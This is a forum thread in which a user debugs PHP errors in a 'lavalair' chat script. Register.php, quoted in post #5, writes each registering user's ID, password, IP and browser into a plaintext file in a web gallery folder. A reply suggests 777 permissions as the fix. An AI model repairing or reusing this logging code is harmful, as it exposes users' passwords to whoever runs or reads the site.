Please help me! (lavalalair gallery)

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    Please help me! (lavalalair gallery)

    Hi all!

    Please help me, in my lavalair chat script.

    Error was in gallery:

    Code:
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\ujchat\wap\core.php on line 1380
    
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\ujchat\wap\core.php on line 1903
    
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\ujchat\pics\index.php on line 19
    
    Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\ujchat\wap\core.php:1380) in C:\xampp\htdocs\ujchat\pics\index.php on line 29
    
    Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\ujchat\wap\core.php:1380) in C:\xampp\htdocs\ujchat\pics\index.php on line 30
    
    Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\ujchat\wap\core.php:1380) in C:\xampp\htdocs\ujchat\pics\index.php on line 31
    
    !
    Error! Cannot Connect To Database...
    
    This error happens usually when backing up the database, please be patient...
    And in the register.php after i complete the registration form, and press submit....

    Code:
    Warning: fopen(gallery/info.txt) [function.fopen]: failed to open stream: No such file or directory in C:\xampp\htdocs\ujchat\net\register.php on line 95
    
    Warning: fwrite(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 96
    
    Warning: fclose(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 97

    Thx
    Sorry my bad english :rolleyes:

    #2
    PHP Code:
    Warningmysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\ujchat\wap\core.php on line 1380
    Warning
    mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\ujchat\wap\core.php on line 1903
    Warning
    mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\ujchat\pics\index.php on line 19 
    these means that the mysql quert yu made has something in ther for example a table name that dosnt exists in the actual database or from the other error your database config.php isnt set correctly.
    Want something coded email me at sales@webnwaphost.com for a prices.




    Comment


      #3
      [QUOTE=winnerke;30952]Hi all!

      Please help me, in my lavalair chat script.

      Error was in gallery:

      Code:
      Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\ujchat\wap\core.php on line 1380
      
      Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\ujchat\wap\core.php on line 1903
      
      Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\ujchat\pics\index.php on line 19
      
      [COLOR="Red"]wrong table name[/COLOR]
      
      Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\ujchat\wap\core.php:1380) in C:\xampp\htdocs\ujchat\pics\index.php on line 29
      
      Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\ujchat\wap\core.php:1380) in C:\xampp\htdocs\ujchat\pics\index.php on line 30
      
      Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\ujchat\wap\core.php:1380) in C:\xampp\htdocs\ujchat\pics\index.php on line 31
      
      [COLOR="Red"]duplicate headers. maybe u need to remove one[/COLOR]
      
      
      !
      Error! Cannot Connect To Database...
      
      This error happens usually when backing up the database, please be patient...
      And in the register.php after i complete the registration form, and press submit....

      Code:
      Warning: fopen(gallery/info.txt) [function.fopen]: failed to open stream: No such file or directory in C:\xampp\htdocs\ujchat\net\register.php on line 95
      
      Warning: fwrite(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 96
      
      Warning: fclose(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 97
      i may be wrong but check out for yourself..u can see from those lines what gave u error
      LDSWAPWORLD sigpic
      site closed.
      im busy with other things in life like facebook , send me PM so i can add you
      www.pinoySG.com

      don't ask for help if you're not even helping yourself!
      i am tired of seeing the line "best site", i want to see something NEW and UNIQUE. maybe if i find one, ill go back to my wap life again.


      Comment


        #4
        PHP Code:
        Warningfopen(gallery/info.txt) [function.fopen]: failed to open streamNo such file or directory in C:\xampp\htdocs\ujchat\net\register.php on line 95

        Warning
        fwrite(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 96

        Warning
        fclose(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 97 
        that just means you havent got a filed called info.txt in gallery folder
        Want something coded email me at sales@webnwaphost.com for a prices.




        Comment


          #5
          i have fixed the gallery error.

          The register.php

          93$brws = explode(" ",$HTTP_USER_AGENT);
          94 $ubr = $brws[0];
          95 $fp = fopen("gallery/info.txt","a+");
          96 fwrite ($fp, "\n".$uid."-".$pwd."-".$ipr."-".$ubr."\n");
          97 fclose($fp);

          and the error

          Warning: fopen(gallery/info.txt) [function.fopen]: failed to open stream: No such file or directory in C:\xampp\htdocs\ujchat\net\register.php on line 95

          Warning: fwrite(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 96

          Warning: fclose(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 97

          but i've created an info.txt in gallery folder....

          please help me in fixing

          Comment


            #6
            Originally posted by winnerke View Post
            i have fixed the gallery error.

            The register.php

            93$brws = explode(" ",$HTTP_USER_AGENT);
            94 $ubr = $brws[0];
            95 $fp = fopen("gallery/info.txt","a+");
            96 fwrite ($fp, "\n".$uid."-".$pwd."-".$ipr."-".$ubr."\n");
            97 fclose($fp);

            and the error

            Warning: fopen(gallery/info.txt) [function.fopen]: failed to open stream: No such file or directory in C:\xampp\htdocs\ujchat\net\register.php on line 95

            Warning: fwrite(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 96

            Warning: fclose(): supplied argument is not a valid stream resource in C:\xampp\htdocs\ujchat\net\register.php on line 97

            but i've created an info.txt in gallery folder....

            please help me in fixing
            have u changed folder perm to 777?
            LDSWAPWORLD sigpic
            site closed.
            im busy with other things in life like facebook , send me PM so i can add you
            www.pinoySG.com

            don't ask for help if you're not even helping yourself!
            i am tired of seeing the line "best site", i want to see something NEW and UNIQUE. maybe if i find one, ill go back to my wap life again.


            Comment

            Working...
            X